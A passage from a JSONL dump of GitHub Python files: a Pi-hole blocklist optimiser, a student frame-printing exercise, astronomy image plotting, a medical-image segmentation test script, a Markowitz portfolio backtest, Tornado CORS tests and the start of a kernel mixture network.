set_removal_domains.update(grep_result)\n # Remove from gravity domains\n set_gravity_domains.difference_update(grep_result)\n # Status update\n print(f'[i] --> {len(grep_result):n} conflicts found')\n\n # If there were no matches\n elif grep_return_code == 1:\n print('[i] --> 0 conflicts found')\n # If there was an error running grep\n elif grep_return_code == 2:\n print('[i] --> An error occurred when running grep command')\n else:\n print('[i] --> No wildcards found')\n\n# Fetch regexps\nprint('[i] Fetching regexps')\n\nif db_exists:\n c.execute('SELECT domain FROM domainlist WHERE TYPE = 3')\n set_regexps.update(x[0] for x in c.fetchall())\nelse:\n # If regex.list exists and isn't 0 bytes\n if os.path.exists(path_legacy_regex) and os.path.getsize(path_legacy_regex) > 0:\n # Read to set\n with open(path_legacy_regex, 'r', encoding='utf-8', errors='ignore') as fOpen:\n set_regexps.update(x for x in map(str.strip, fOpen) if x and x[:1] != '#')\n\nif set_regexps:\n print(f'[i] --> {len(set_regexps):n} regexps found')\n print('[i] Checking for gravity matches')\n\n # Initialise temp file for regexps\n with tempfile.NamedTemporaryFile('w+') as temp_regexps:\n # Initialise temp file for gravity\n with tempfile.NamedTemporaryFile('w+') as temp_gravity:\n # Add regexps to temp file\n for line in set_regexps:\n temp_regexps.write(f'{line}\\n')\n # Add gravity domains to temp file\n for line in set_gravity_domains:\n temp_gravity.write(f'{line}\\n')\n\n # Seek to start of files\n temp_regexps.seek(0)\n temp_gravity.seek(0)\n\n # Create a subprocess command to run a fixed-string grep search\n # for wildcards against the domains\n cmd = subprocess.Popen(['grep', '-Ef', temp_regexps.name, temp_gravity.name],\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8')\n\n # Run the command\n grep_result = [x for x in cmd.communicate()[0].split('\\n') if x]\n # Fetch the return code\n grep_return_code = cmd.returncode\n\n # If there were matches\n if grep_return_code == 0:\n # Add to removal domains\n set_removal_domains.update(grep_result)\n # Remove from gravity domains\n set_gravity_domains.difference_update(grep_result)\n # Status update\n print(f'[i] --> {len(grep_result):n} matches found in gravity')\n\n # If there were no matches\n elif grep_return_code == 1:\n print('[i] --> 0 matches found in gravity')\n # If there was an error running grep\n elif grep_return_code == 2:\n print('[i] --> An error occurred when running grep command')\nelse:\n print('[i] --> No regexps found')\n\n# If there are domains remaining post-processing and it's less than the the initial count\nif set_removal_domains:\n\n if db_exists:\n print('[i] Running deletions')\n\n # Define list chunk size\n chunk_size = 1000\n\n # For each list chunk\n for chunk in split_list(list(set_removal_domains), chunk_size):\n # Run the deletions\n c.executemany('DELETE FROM gravity '\n 'WHERE domain IN (?)', [(x,) for x in chunk])\n\n # Commit Changes\n conn.commit()\n\n # Query actual DB count\n c.execute('SELECT COUNT(DISTINCT domain) FROM gravity')\n count_db_gravity = c.fetchall()[0][0]\n print(f'[i] --> {count_db_gravity:n} domains remain in the gravity database')\n\n # Update gravity_count in info table\n print('[i] Updating the gravity count in the info table')\n c.execute('INSERT OR REPLACE INTO info (property, value) VALUES (?, ?)', ('gravity_count', count_db_gravity))\n\n # Commit Changes\n conn.commit()\n\n conn.close()\n else:\n print('[i] Outputting updated gravity.list')\n\n # Output gravity set to gravity.list\n with open(path_legacy_gravity, 'w', encoding='utf-8') as fWrite:\n for line in sorted(set_gravity_domains):\n fWrite.write(f'{line}\\n')\n\n print(f'[i] --> {len(set_gravity_domains):n} domains remain in gravity.list')\n\n print('[i] Restarting Pi-hole')\n subprocess.call(['pihole', 'restartdns', 'reload'], stdout=subprocess.DEVNULL)\nelse:\n print('[i] No optimisation required')\n","repo_name":"mmotti/pihole-gravity-optimise","sub_path":"gravityOptimise.py","file_name":"gravityOptimise.py","file_ext":"py","file_size_in_byte":10610,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"40"} +{"seq_id":"9888642610","text":"def messagePrint(number, message, thickness):\n\tboarder = thickness*\"|\"\n\tfor i in range(number):\n\t\tprint(boarder + \" \" + message + \" \" + boarder )\n\ndef boarder(length, thickness, placement):\n\tbar = \"-\" * (length + 2)\n\tif placement == \"TOP\":\t\t\n\t\tfor i in range(0, thickness):\n\t\t\tleft = \"|\"*i + \"+\" + \"-\"*(thickness - 1 - i)\n\t\t\tright = left[::-1]\n\t\t\tprint(left + bar + right)\n\telif placement == \"BOTTOM\":\n\t\tfor i in range(thickness-1, -1, -1):\n\t\t\tleft = \"|\"*i + \"+\" + \"-\"*(thickness - 1 - i)\n\t\t\tright = left[::-1]\n\t\t\tprint(left + bar + right)\ndef main():\n\tmessage = input(\"Enter the message:\\n\")\n\tcount = eval(input(\"Enter the message repeat count:\\n\"))\n\tthickness = eval(input(\"Enter the frame thickness:\\n\"))\n\tmessageLength = len(message)\n\tboarder(messageLength, thickness, \"TOP\")\n\tmessagePrint(count, message, thickness)\n\tboarder(messageLength, thickness, \"BOTTOM\")\n\t\nmain()\t\n\n'''\nEnter the message:\nHello World\nEnter the message repeat count:\n3\nEnter the frame thickness:\n2\n+---------------+\n|+-------------+|\n|| Hello World ||\n|| Hello World ||\n|| Hello World ||\n|+-------------+|\n+---------------+\n'''\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_3/smyjas002/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18774344827","text":"# Loads and plots the radmc3d-computed SEDs with and without star.\n# ============================================================================ #\n#\nimport numpy as np\nimport scipy as s\nfrom scipy import ndimage\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nrc('font',**{'family':'serif','serif':['serif']})\nrc('text', usetex=True)\n#\n# Useful Constants\n# \nfrom constants import *\nfrom inputdata import *\n#\n# useful function(s)\n#\nimport settickslabels\n#\n# ============================================================================ #\n#\n# Load the data. Flux density is in erg cm-2 s-1 Hz-1 ster-1.\n# Yes, manually change the filename :P\n# This variable is since I often have many images and want to switch between\n# them easily.\n#\nfilename = 'image50um_edgeon.out'\n#\nimagedata = open(filename, 'r').readlines()\nnpix = int(imagedata[1].split()[0])\npixsizeau = float(imagedata[3].split()[0]) / AUcm # Pixel size in AU\npixsize = pixsizeau / distance # and in asec\nwavelength = float(imagedata[4])\nimage1d = np.zeros(npix*npix)\nfor n,data in enumerate(imagedata[6:-2]):\n image1d[n] = float(data)\n#\n# Set up image axis\n#\nsizeau = npix * pixsizeau # Length of side of image in AU\nsizemas = sizeau / distance # Length of side of image in mas\naxisplot = [0.5*sizeau,-0.5*sizeau,-0.5*sizeau,0.5*sizeau]\naxisrange = np.linspace(-0.5*sizeau,0.5*sizeau,npix)\n#\n# Recalculate flux to Jy asec-2 at distance to the star\n# 1sec2 = 2.35044305391e-11 ster\n#\nimage1d = image1d * 1.e23 * asecsqster * pixsize**2.\n#\n# Extract limits\n#\nfluxmin,fluxmax = np.min(image1d),np.max(image1d)\nlogfluxrange = np.logspace(np.log10(fluxmax)-10.,np.log10(fluxmax),10)\n#\n# Extract 2D image from input image data\n#\nimage2d = np.zeros((npix,npix))\nlogimage2d = np.zeros((npix,npix))\nnpixtot = int(npix*npix)\nnx,ny = 0,0\nfor nn in range(npixtot):\n image2d[nx,ny] = image1d[nn]\n if image1d[nn] <= logfluxrange[0]:\n logimage2d[nx,ny] = np.log10(logfluxrange[0])\n else:\n logimage2d[nx,ny] = np.log10(image1d[nn])\n nx += 1\n if nx == npix:\n nx = 0\n ny += 1\n#\n# Apply filter to emulate telescope resolution\n# Sigma in pixels (FWHM is 5.6 asec, FWHM ~ 2 sqrt 2 ln sigma )\n#\nresolution = 5.6 / 2.355\nfiltimage2d = s.ndimage.gaussian_filter(image2d, sigma=resolution)\nfiltimagemax = np.max(filtimage2d)\nlogfiltimage2d = s.ndimage.gaussian_filter(logimage2d, sigma=resolution)\nlogmax = np.log10(filtimagemax)\n#\n# Plot and print outputs. ==================================================== #\n#\nplt.ion()\n#\n# Image\n#\nplt.figure('Simulated original images')\nfor nn in range(6):\n plt.subplot(2,3,1+nn)\n plt.imshow(image2d, origin='lower', interpolation='nearest', vmin=fluxmin, vmax=np.logspace(-6,0,6)[nn]*fluxmax, extent=axisplot)\n cb = plt.colorbar(orientation = 'vertical',shrink=0.6,pad=0.15)\n cb.set_label(label = r'Flux density, (Jy/arcsec$^2$)',fontsize= 18)\n cb.ax.tick_params(labelsize=18)\n settickslabels.settickslabels(xlabel=\"Offset (AU)\", ylabel=\"Offset (AU)\", xscale=\"lin\", yscale=\"lin\")\n#\n# Filtered image\n#\nplt.figure('Simulated convolved image')\nplt.imshow(filtimage2d, origin='lower', interpolation='nearest', vmin=fluxmin, vmax=filtimagemax, extent=axisplot)\ncb = plt.colorbar(orientation = 'vertical',shrink=0.6,pad=0.15)\ncb.set_label(label = r'Flux density, (Jy/arcsec$^2$)',fontsize= 18)\ncb.ax.tick_params(labelsize=18)\nsettickslabels.settickslabels(xlabel=\"Offset (AU)\", ylabel=\"Offset (AU)\", xscale=\"lin\", yscale=\"lin\")\n#\n# Logged Filtered image\n#\nplt.figure('Simulated convolved logged image')\nplt.imshow(logfiltimage2d, origin='lower', interpolation='nearest', vmin=np.log10(logfluxrange[0]), vmax=logmax, extent=axisplot)\ncb = plt.colorbar(orientation = 'vertical',shrink=0.6,pad=0.15)\ncb.set_label(label = r'Log10 of flux density, (Jy/arcsec$^2$)',fontsize= 18)\ncb.ax.tick_params(labelsize=18)\nsettickslabels.settickslabels(xlabel=\"Offset (AU)\", ylabel=\"Offset (AU)\", xscale=\"lin\", yscale=\"lin\")\n#\n# Filtered image contours\n#\nplt.figure('Simulated convolved contours')\nplt.contour(axisrange,axisrange,filtimage2d,logfluxrange)\nsettickslabels.settickslabels(xlabel=\"Offset (AU)\", ylabel=\"Offset (AU)\", xscale=\"lin\", yscale=\"lin\")\n","repo_name":"jwiegert/astro-dust-codes","sub_path":"plotimageout.py","file_name":"plotimageout.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73928754360","text":"import torch\nimport torchvision.transforms as transforms\nfrom models import tiramisu\nfrom datasets import MSDataset\nfrom datasets import joint_transforms\nimport utils.training as train_utils\nfrom pathlib import Path\nimport os\nimport numpy\nimport random\n\n\n# Define options\nopt_defs = {}\n\n# Dataset options\nopt_defs[\"n_classes\"] = dict(flags = ('-nc', '--nclasses'), info=dict(default=2, type=int, help=\"num of classes\"))\nopt_defs[\"mean\"] = dict(flags = ('-mean', '--mean'), info=dict(default=0.1026, type=float, help=\"mean for dataset normalization\"))\nopt_defs[\"std\"] = dict(flags = ('-std', '--std'), info=dict(default=0.0971, type=float, help=\"std for dataset normalization\"))\n#opt_defs[\"dataset_path\"] = dict(flags = ('-dp', '--dataset-path'), info=dict(default=\"../../dataset/MS_Scan/dataset_Test_P2_T4\", type=str, help=\"path to dataset on IPLAB\"))\n#opt_defs[\"dataset_path\"] = dict(flags = ('-dp', '--dataset-path'), info=dict(default=\"./dataset/ISBI_2015\", type=str, help=\"path to dataset\"))\nopt_defs[\"dataset_path\"] = dict(flags = ('-dp', '--dataset-path'), info=dict(default=\"D:/Alessia/2_MS_Project_Gruppo_Imaging/dataset/ISBI_2015/ISBI_2015_PC\", type=str, help=\"path to dataset on PC\"))\nopt_defs[\"test_dataset\"] = dict(flags = ('-td','--test-dataset',), info=dict(default='test1', type=str, help=\"test1-5\"))\nopt_defs[\"weights_path\"] = dict(flags = ('-wp', '--weights-path'), info=dict(default=\"./tiramisu_weights_ms/\", type=str, help=\"path to weights\"))\nopt_defs[\"base_output_path\"] = dict(flags = ('-bop', '--base-output-path'), info=dict(default=\"/Patient-\", type=str, help=\"where to save output\"))\nopt_defs[\"patient_name\"] = dict(flags = ('-pn', '--patient-name'), info=dict(default='Patient-', type=str, help=\"patient name\"))\nopt_defs[\"patients\"] = dict(flags = ('-patients', '--patients'), info=dict(default=[1], nargs ='+', type=int, help=\"patients to test\"))\n\n# Model options\nopt_defs[\"lstm_kernel_size\"] = dict(flags = ('-lstmkernel','--lstm-kernel-size',), info=dict(default=3, type=int, help=\"lstm kernel size\"))\nopt_defs[\"lstm_num_layers\"] = dict(flags = ('-lstmnumlayers','--lstm-num-layers',), info=dict(default=1, type=int, help=\"lstm kernel size\"))\nopt_defs[\"use_sa\"] = dict(flags = ('-usesa', '--use-sa'), info=dict(default=True, type=bool, help=\"use Squeeze and Attention blocks (use:True, not use: False)\"))\nopt_defs[\"use_stn\"] = dict(flags = ('-usestn', '--use-stn'), info=dict(default=False, type=bool, help=\"use stn (use:True, not use: False)\"))\nopt_defs[\"use_lstm\"] = dict(flags = ('-ulstm', '--use-lstm'), info=dict(default=False, type=bool, help=\"use lstm (use:True, not use: False)\"))\nopt_defs[\"seq_size\"] = dict(flags = ('-ss', '--seq-size'), info=dict(default=1, type=int, help=\"sequence size\"))\nopt_defs[\"sliding_window\"] = dict(flags = ('-sw', '--sliding-window'), info=dict(default=True, type=bool, help=\"use sliding window (compute the loss only w.r.t. the central slice in the sequence)(use:True, not use: False)\"))\nopt_defs[\"bidirectional\"] = dict(flags = ('-bi', '--bidirectional'), info=dict(default=False, type=bool, help=\"bidirectional c-lstm (use:True, not use: False)\"))\nopt_defs[\"input_dim\"] = dict(flags = ('-dim', '--input-dim'), info=dict(default=160, type=int, help=\"input dim\"))\n\n# Training options\nopt_defs[\"optim\"] = dict(flags = ('-o', '--optim'), info=dict(default=\"RMSprop\", help=\"optimizer\"))\nopt_defs[\"learning_rate\"] = dict(flags = ('-lr', '--learning-rate'), info=dict(default=1e-4, type=float, help=\"learning rate\"))\nopt_defs[\"learning_rate_decay_by\"] = dict(flags = ('-lrdb', '--learning-rate-decay-by'), info=dict(default=0.995, type=float, help=\"learning rate decay factor\"))\nopt_defs[\"learning_rate_decay_every\"] = dict(flags = ('-lrde', '--learning-rate-decay-every'), info=dict(default=10, type=int, help=\"learning rate decay period\"))\nopt_defs[\"weight_decay\"] = dict(flags = ('-wd', '--weight-decay',), info=dict(default=1e-4, type=float, help=\"weight decay\"))\nopt_defs[\"loss_type\"] = dict(flags = ('-lt', '--loss-type'), info=dict(default='dice', type = str, help=\"the type of loss, i.e. dice\"))\n\n# Checkpoint options\nopt_defs[\"weights_fname\"] = dict(flags = ('-wf', '--weights-fname'), info=dict(default=None, type=str, help=\"weights file name, i.e. 'weights-#tag-#folder-#epochs.pth'\"))\n\n# Read options\nimport argparse\nparser = argparse.ArgumentParser()\nfor k,arg in opt_defs.items():\n print(arg[\"flags\"])\n parser.add_argument(*arg[\"flags\"], **arg[\"info\"])\nopt = parser.parse_args(None)\nprint(opt)\n\n\n#Dataset option\nn_classes = opt.nclasses\nmean = opt.mean\nstd = opt.std\nDATASET_PATH = Path(opt.dataset_path)\ntest_dir = opt.test_dataset\nWEIGHTS_PATH = Path(opt.weights_path)\nbase_output_path = opt.base_output_path\npatient_name = opt.patient_name\npatients = opt.patients\n\n# Model options\nlstm_kernel_size = opt.lstm_kernel_size\nlstm_num_layers = opt.lstm_num_layers\nuse_sa = opt.use_sa\nuse_stn = opt.use_stn\nuse_lstm = opt.use_lstm\nseq_size = opt.seq_size\nsliding_window = opt.sliding_window\nbidirectional = opt.bidirectional\ninput_dim = opt.input_dim\n\n# Training options\noptim = opt.optim\nlr = opt.learning_rate\nlr_decay = opt.learning_rate_decay_by\nweight_decay = opt.weight_decay\nloss_type = opt.loss_type\nnum_epochs = opt.num_epochs\n\n# Checkpoint options\nweights_fname = opt.weights_fname\n\n\ntorch.backends.cudnn.enabled = True\ntorch.backends.cudnn.deterministic=True\nseed = 1\nrandom.seed(seed)\nnumpy.random.seed(seed)\ntorch.cuda.manual_seed(seed)\ntorch.manual_seed(seed)\n\n\nif seq_size > 1:\n use_lstm = True\n use_se = True\nelse:\n use_lstm = False\n use_se = True\n\n#SET DEVICE\ndev = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(dev)\n\ndice_vector = []\nsens_vector = []\nspec_vector = []\n\nif __name__ == '__main__':\n\n model = tiramisu.FCDenseNet67(loss_type=loss_type, n_classes=2, grow_rate = 12, use_stn=use_stn, use_se=use_se, seq_size=seq_size, use_lstm=use_lstm,\n lstm_kernel_size=lstm_kernel_size, lstm_num_layers=lstm_num_layers,\n bidirectional=bidirectional)\n model = model.to(dev)\n\n #SET OPTIMIZER\n if optim == 'SGD':\n optimizer = torch.optim.SGD(model.parameters(), lr=lr, weight_decay=weight_decay)\n elif optim == 'RMSprop':\n optimizer = torch.optim.RMSprop(model.parameters(), lr=lr, weight_decay=weight_decay)\n else:\n raise ValueError(\"Optimizer chosen not implemented!\")\n\n train_utils.load_weights(model, optimizer, os.path.join(WEIGHTS_PATH, weights_fname))\n model.eval()\n for p in patients:\n print(p)\n\n test_dset = MSDataset.MSDataset(\n DATASET_PATH, test_dir, joint_transform=None,\n transform=transforms.Compose([\n transforms.ToTensor(),\n ]),seq_size=seq_size, sliding_window = sliding_window, input_dim = input_dim, patient_name = patient_name + str(p))\n\n test_loader = torch.utils.data.DataLoader(\n test_dset, batch_size=1, shuffle=False)\n print(\"Test patient: %d, size %d\" % (p, len(test_loader.dataset.imgs)))\n\n #set base_output_path\n weights_fname_ = weights_fname.split('.pth')\n weights_fname__ = weights_fname_.split('-')\n fold_id = weights_fname__[-2]\n print(\"Fold\" + fold_id + base_output_path + str(p))\n OUTPUT_PATH = Path(\"Fold\" + fold_id + base_output_path + str(p))\n OUTPUT_PATH.mkdir(exist_ok=True)\n\n test_dice, test_sens, test_spec, test_acc, test_err, test_ppv, test_npv, test_extra_frac, text_iou = train_utils.compute_output(model, test_loader, OUTPUT_PATH, seq_size, sliding_window)\n \n print(\"Dice: %4f\" % test_dice)\n dice_vector.append(test_dice)\n print(\"Sens: %4f\" % test_sens)\n sens_vector.append(test_sens)\n print(\"Spec: %4f\" % test_spec)\n spec_vector.append(test_spec)\n print(\"Acc: %4f\" % test_acc)\n print(\"Err: %4f\" % test_err)\n print(\"PPV: %4f\" % test_ppv)\n print(\"NPV: %4f\" % test_npv)\n print(\"Extra Fraction: %4f\" % test_extra_frac)\n print(\"IOU: %4f\" % text_iou)\n\n\n print(\"Dice MAX: %4f\" % numpy.max(numpy.array(dice_vector)))\n print(\"Dice mean: %4f\" % numpy.mean(numpy.array(dice_vector)))\n print(\"Dice std: %4f\" % numpy.std(numpy.array(dice_vector)))\n\n print(\"Sens mean: %4f\" % numpy.mean(numpy.array(sens_vector)))\n print(\"Sens std: %4f\" % numpy.std(numpy.array(sens_vector)))\n\n print(\"Spec mean: %4f\" % numpy.mean(numpy.array(spec_vector)))\n print(\"Spec std: %4f\" % numpy.std(numpy.array(spec_vector)))\n","repo_name":"ictlab-unict/attention-cnn-MS-segmentation","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"40"} +{"seq_id":"17657023728","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom pandas import Timestamp\nfrom pypfopt import EfficientFrontier\nfrom pypfopt import risk_models\nfrom pypfopt import expected_returns\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# 데이터 병합\nsectors_data = {}\nexcel_file_path = '../stocks_2000_2020_data_by_sector-2.xlsx'\nsnp_price_data = pd.ExcelFile(excel_file_path)\nfor sheet_name in snp_price_data.sheet_names:\n sheet_data = pd.read_excel(excel_file_path, sheet_name=sheet_name)\n sheet_data['Date'] = pd.to_datetime(sheet_data['Unnamed: 0'])\n sheet_data.set_index('Date', inplace=True)\n sheet_data.drop(columns='Unnamed: 0', inplace=True)\n sectors_data[sheet_name] = sheet_data\n\n# 데이터프레임 생성\ndf = pd.DataFrame()\nfor sector, data in sectors_data.items():\n data.columns = [f\"{sector}_{col}\" for col in data.columns]\n if df.empty:\n df = data\n else:\n df = df.join(data, how='outer')\n\n# 로그수익률 시계열 생성\nreturn_df = np.log(df / df.shift(1))\n\n# 날짜 계산\ninvest_start_day = return_df.index[return_df.index>='2003-01-01'][0]\nlearn_window = 60\ninvest_window = 20\ninvest_end_day = return_df.index[return_df.index.tolist().index(invest_start_day) + invest_window]\nlearn_start_day = return_df.index[return_df.index.tolist().index(invest_start_day) - learn_window]\nlearn_end_day = return_df.index[return_df.index.tolist().index(invest_start_day) - 1]\nreturns_all = [0]\nwhile invest_end_day< Timestamp('2020-12-30'):\n # 학습 데이터 수집\n learn_data = df.loc[learn_start_day:learn_end_day].dropna(axis=1)\n learn_data = learn_data.iloc[:, :100]\n # 포트폴리오 계산\n mu = expected_returns.mean_historical_return(learn_data)\n S = risk_models.sample_cov(learn_data)\n ef = EfficientFrontier(mu, S)\n try:\n ef.min_volatility()\n w = ef.clean_weights()\n w_df = pd.DataFrame([w.values()], columns=w)\n # 수익률 계산\n returns = []\n for i, v in enumerate(w_df):\n returns.append(np.log(df.loc[invest_end_day, v] / df.loc[invest_start_day, v]))\n w_df.loc[1] = returns\n w_df.loc[2] = w_df.loc[0] * w_df.loc[1]\n this_return = w_df.loc[2].sum()\n except:\n print('error')\n this_return = 0\n returns_all.append(this_return)\n # 다음 투자 기간으로 리밸런싱\n next_invest_end_index = return_df.index.tolist().index(invest_end_day) + invest_window + 1 # 다음 투자기간 종료\n next_invest_start_index = return_df.index.tolist().index(invest_start_day) + invest_window + 1 # 다음 투자기간 시작\n\n # 인덱스가 범위를 벗어나는지 확인\n if next_invest_end_index >= len(return_df.index) or next_invest_start_index >= len(return_df.index):\n break\n\n # 다음 투자 update\n invest_start_day = return_df.index[next_invest_start_index]\n invest_end_day = return_df.index[next_invest_end_index]\n learn_start_day = return_df.index[next_invest_start_index - learn_window]\n learn_end_day = return_df.index[next_invest_start_index - 1]\n\n# 월별 로그수익률 계산\nmonthly_returns = returns_all\n\ndf_monthly_returns = pd.DataFrame(monthly_returns, columns=['0'])\ndf_monthly_returns.reset_index(inplace=True)\ndf_monthly_returns.rename(columns={\"index\": \"Unnamed: 0\"}, inplace=True)\ndf_monthly_returns.to_csv(\"monthly_returns_markowitz.csv\", index=False)\n\n\n# monthly_returns_df = pd.DataFrame({'Date': df.index[1:len(monthly_returns) + 1], 'Cumulative_Log_Return': np.cumsum(monthly_returns)})\n# monthly_returns_df.to_csv(\"monthly_returns_markowitz.csv\", index=False)\n\n# monthly_cumulative_returns_df = pd.DataFrame({'Date': df.index[1:len(monthly_returns)+1], 'Cumulative_Log_Return': np.cumsum(monthly_returns)})\n# monthly_cumulative_returns_df.to_csv(\"markowitz_cumulative_returns.csv\", index=False)\n\n# 연 로그수익률, 표준편차 계산\nannual_log_return = np.mean(monthly_returns) * 12 / invest_window * 20\nannual_volatility = np.std(monthly_returns) * np.sqrt(12/invest_window*20) # 연별 표준편차\n\n\n# 1. Sharpe Ratio\nrisk_free_rate = 0.02\nsharpe_ratio = (annual_log_return - risk_free_rate) / annual_volatility\n\n\n# 2. Sortino Ratio\ndownside_risks = [r for r in monthly_returns if r < 0]\ndownside_volatility = np.std(downside_risks) * np.sqrt(12)\nsortino_ratio = (annual_log_return - risk_free_rate) / downside_volatility\n\n\n# 3. Profit Factor\ngross_profit = sum([r for r in monthly_returns if r > 0])\ngross_loss = abs(sum([r for r in monthly_returns if r < 0]))\nprofit_factor = gross_profit / gross_loss if gross_loss != 0 else np.inf # gross_loss가 0이면 profit_factor는 무한대\n# 누적 수익률 계산\ncumulative_returns = np.cumsum(monthly_returns)\n\nprint(len(cumulative_returns))\n# MDD 계산\nrunning_max = np.maximum.accumulate(cumulative_returns)\ndrawdown = cumulative_returns - running_max\nmdd = np.min(drawdown) # MDD는 drawdown의 최소값\n\n# Calmar Ratio 계산\nif mdd != 0:\n calmar_ratio = annual_log_return / abs(mdd)\nelse:\n calmar_ratio = np.mean(cumulative_returns) # MDD가 0인 경우 평균 누적 수익률로 대체\n\n# 연도별로 cumulative_returns 분할\nyears = list(range(2003, 2021))\nannual_returns = []\n\nfor i in range(0, len(years) - 1): # 마지막 연도는 별도로 처리\n start_index = i * (12 // (invest_window // 20))\n end_index = start_index + (12 // (invest_window // 20))\n\n # out-of-bounds 오류\n if end_index >= len(cumulative_returns):\n end_index = len(cumulative_returns) - 1\n\n annual_return = cumulative_returns[end_index] - cumulative_returns[start_index]\n annual_returns.append(annual_return)\n\n# 마지막 연도의 수익률을 별도로 계산\nstart_index = (years[-1] - 2003) * (12 // (invest_window // 20))\nif start_index < len(cumulative_returns):\n annual_return = cumulative_returns[-1] - cumulative_returns[start_index]\n annual_returns.append(annual_return)\n\n# profitable과 unprofitable years 계산\nprofitable_years = len([r for r in annual_returns if r > 0])\nunprofitable_years = len([r for r in annual_returns if r <= 0])\n\nprint(f\"Profitable Years: {profitable_years}\")\nprint(f\"Unprofitable Years: {unprofitable_years}\")\nprint(round(annual_log_return, 3))\nprint(round(annual_volatility, 3))\nprint(round(sharpe_ratio, 3))\nprint(round(sortino_ratio, 3))\nprint(round(downside_volatility, 3))\nprint(round(profit_factor, 3))\nprint(round(gross_profit, 3))\nprint(round(gross_loss, 3))\nprint(round(mdd, 3))\nprint(round(calmar_ratio, 3))\n\n","repo_name":"yejiikim/BLPortfolio-KShape","sub_path":"markowitz/4. markowitz.py","file_name":"4. markowitz.py","file_ext":"py","file_size_in_byte":6523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34565145093","text":"# -*- coding: utf-8 -*-\n#\n# H A P P Y H A C K I N G !\n# _____ ______\n# ____==== ]OO|_n_n__][. | |\n# [________]_|__|________)< |YANG|\n# oo oo 'oo OOOO-| oo\\\\_ ~o~~o~\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+\n# Jianing Yang @ 16 Feb, 2018\n#\nfrom tornado.testing import AsyncHTTPTestCase\nfrom tornado_battery.extra import try_get_value, CORSHandlerMixin\nfrom tornado_battery.schema import schema\nfrom tornado.web import Application as WebApplication, RequestHandler\nfrom tornado.options import options\nimport pytest\n\n\n@pytest.fixture\ndef data():\n\n return {\n '1': {\n 'A': {\n 'a': 'value',\n },\n 'B': 'Bvalue',\n },\n }\n\n\ndef test_last_node(data):\n assert try_get_value(data, '1.A.a', None) == 'value'\n\n\ndef test_last_non_exists(data):\n assert try_get_value(data, '1.A.b', 'n/a') == 'n/a'\n\n\ndef test_middle_non_exists(data):\n assert try_get_value(data, '1.c.a', 'n/a') == 'n/a'\n\n\ndef test_middle_node(data):\n assert try_get_value(data, '1.B', 'n/a') == 'Bvalue'\n\n\ndef test_empty(data):\n assert try_get_value(data, '', 'n/a') == 'n/a'\n\n\ndef test_non_dict():\n assert try_get_value(1, '', 'n/a') == 'n/a'\n\n\nclass CORSHandler(CORSHandlerMixin, RequestHandler):\n\n @schema(reply=True)\n async def get(self):\n return dict(name='john', age=20)\n\n def options(self):\n super().options()\n\n\nclass TestApp(AsyncHTTPTestCase):\n\n def get_app(self):\n app = WebApplication([\n (r'/cors', CORSHandler),\n ])\n return app\n\n def test_cors_with_debug(self):\n options.debug = True\n response = self.fetch('/cors', method='GET')\n options.debug = False\n headers = response.headers\n assert headers['Access-Control-Allow-Origin'] == '*'\n assert (headers['Access-Control-Allow-Methods'] ==\n 'GET, POST, PUT, DELETE, OPTIONS, HEAD, PATCH')\n assert headers['Access-Control-Max-Age'] == '3600'\n assert (headers['Access-Control-Allow-Headers'] ==\n 'Content-Type, Access-Control-Allow-Headers')\n assert response.code == 200\n options.debug = True\n response = self.fetch('/cors', method='OPTIONS')\n headers = response.headers\n options.debug = False\n assert headers['Allow'] == 'POST, GET, PUT, DELETE, OPTIONS, PATCH'\n\n def test_cors(self):\n response = self.fetch('/cors', method='GET')\n headers = response.headers\n assert 'Access-Control-Allow-Origin' not in headers\n assert 'Access-Control-Allow-Methods' not in headers\n assert 'Access-Control-Max-Age' not in headers\n assert 'Access-Control-Allow-Headers' not in headers\n assert response.code == 200\n response = self.fetch(f'/cors', method='OPTIONS')\n assert 'Allow' not in headers\n","repo_name":"jianingy/tornado_battery","sub_path":"tests/test_extra.py","file_name":"test_extra.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"32744819406","text":"import numpy as np\nimport platform\nimport json\nimport sys\nimport os\nimport copy\nimport argparse\nimport time\n\nfrom scipy.io import netcdf\nfrom ipdb import set_trace as stop\n\nimport keras.backend as K\nfrom keras.callbacks import CSVLogger, LearningRateScheduler, ModelCheckpoint\nfrom keras.layers import Input, Lambda, Dense, Flatten, BatchNormalization, Activation, Conv1D, add, concatenate\nfrom keras.models import Model, load_model\nfrom keras.optimizers import Adam\nfrom keras.utils import plot_model\nfrom sklearn.cluster import KMeans, AgglomerativeClustering\nimport pandas as pd\nfrom contextlib import redirect_stdout\n\ndef residual(inputs, n_filters, activation, strides):\n x0 = Conv1D(n_filters, 1, padding='same', kernel_initializer='he_normal', strides=strides)(inputs)\n\n x = Conv1D(n_filters, 3, padding='same', kernel_initializer='he_normal', strides=strides)(inputs)\n x = BatchNormalization()(x)\n x = Activation(activation)(x) \n x = Conv1D(n_filters, 3, padding='same', kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = add([x0, x])\n\n return x\n\nclass kernel_mixture_network(object):\n\n def __init__(self, parsed):\n\n self.root = parsed['model']\n self.var = parsed['var']\n\n self.lower = np.asarray([0.05, -5.0, 5.0, 0.0, 0.0, 0.0, -180.0, 0.0, -180.0])\n self.upper = np.asarray([3.0, 5.0, 18.0, 0.5, 1000.0, 180.0, 180.0, 180.0, 180.0])\n\n tmp = np.load(\"{0}_{1}_centers.npz\".format(self.root, self.var))\n self.center_locs = tmp['center_locs']\n self.sigmas 